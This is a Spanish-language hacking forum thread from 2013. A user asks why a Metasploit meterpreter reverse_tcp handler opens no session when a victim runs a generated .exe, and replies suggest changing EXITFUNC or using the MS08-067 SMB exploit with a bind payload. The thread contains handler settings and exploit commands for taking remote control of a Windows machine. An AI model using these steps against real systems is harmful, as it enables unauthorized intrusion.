Título: No consigo meterpreter pero si la shell Publicado por: fekaa en 13 Febrero 2013, 23:41 pm Buen día estimados.
Estoy intentando obtener la meterpreter a través de reverse_tcp en Windows desde Linux con el metasploit. El problema es que una shell consigo obtener perfectamente. Cuando la máquina víctima ejecuta el .exe que generé anteriormente, no hay problema; si intento obtener una sesión meterpreter, la salida en el metasploit es la siguiente: Citar msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp El problema es que se queda en PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 192.168.1.102 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit
Título: Re: No consigo meterpreter pero si la shell Publicado por: alister en 14 Febrero 2013, 04:16 am juega a cambiar la EXITFUNC
Título: Re: No consigo meterpreter pero si la shell Publicado por: basdi en 5 Noviembre 2013, 08:52 am amigo intenta esto y después comenta:
use exploit /windows/smb/ms08_067_netapi set rhost 192.xxx.x.xx (ip victima ) set payload windows/meterpreter/bind_tcp set lhost 192.xxx.x.xx (ip atacante) explloit si tu sistema es xp virgen (pelado ) si no consigues el Shell lee esto quizás hay esta tu respuesta http://www.blackploit.com/2009/11/por-que-no-consigo-shell-con-mi.html |